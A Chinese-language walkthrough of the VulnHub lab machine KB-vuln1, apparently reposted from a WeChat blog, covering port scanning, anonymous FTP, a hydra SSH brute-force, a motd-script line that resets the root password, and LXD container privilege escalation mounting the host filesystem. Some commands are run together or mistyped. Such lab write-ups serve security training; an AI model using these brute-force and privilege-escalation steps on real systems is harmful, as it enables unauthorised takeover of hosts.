vulnhub-KB-vuln1

admin 2020年10月8日15:30:48评论196 views字数 1100阅读3分40秒阅读模式

实验环境

kali攻击机ip:192.168.56.116

KB-vuln1靶机ip:192.168.56.147

知识点及工具

nmap扫描

ftp服务匿名访问

hydra爆破

lxd提权

靶机难度

简单

开始渗透

首先第一步对目标靶机网络端口扫描 

nmapAp- 192.168.56.147

vulnhub-KB-vuln1

扫描结果目标服务开放了21(ftp),22(ssh),80 (http)端口

ftp看着是可以匿名访问,利用一下,结果看不到信息,应该还会有隐藏文件

ftp://192.168.56.147

vulnhub-KB-vuln1

vulnhub-KB-vuln1

有个历史文件,下载下来看看

vulnhub-KB-vuln1

看记录应该是修改了motd文件,接着看看其他信息吧,访问了80端口,目录扫描了都未发现新情况

vulnhub-KB-vuln1

右击查看源代码,在源代码里面找到一个用户名

vulnhub-KB-vuln1


页面也没有登录界面,于是尝试了ssh,很快就爆破出来了

hydra –l sysadmin –P /usr/share/wordlists/rockyou.txt ssh://192.168.56.147

vulnhub-KB-vuln1

登录靶机,之前在ftp里面有个bash_history文件,然后直奔motd文件,发现可编辑,而且root权限。(你也可以反弹shell)

echo "echo 'root:mrlee' | sudo chpasswd" >> 00-header

vulnhub-KB-vuln1

退出,重新登录,切换root用户

vulnhub-KB-vuln1

看着sysadmin还属于lxd组用户,继续尝试lxd提权

https://www.freebuf.com/articles/network/216803.html

kali机编译

git clone https://github.com/saghul/lxd-alpine-builder.gitcd lxd-alpine-builder./build-alpine

运行完上述命令之后,会在当前目录下创建一个xxx.tar.gz文件,然后将其发送至目标靶机系统。

靶机

文件传完成之后,就可以将其以镜像的形式添加进LXD了

lxc image import ./apline-v3.12-x86_64-20201007_2053.tar.gz--alias myimage

查看容器列表里有没有添加成功

lxc image list

开始配置

lxd init(一路回车)lxc init myimage ignite -csecurity.privileged=truelxc config device add ignite mydevice disksource=/ path=/mnt/root recursive=truelxc start ignitelxc exec ignite /bin/sh

vulnhub-KB-vuln1


本文始发于微信公众号(MrLee 小师父):vulnhub-KB-vuln1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年10月8日15:30:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub-KB-vuln1http://cn-sec.com/archives/152012.html

发表评论

匿名网友 填写信息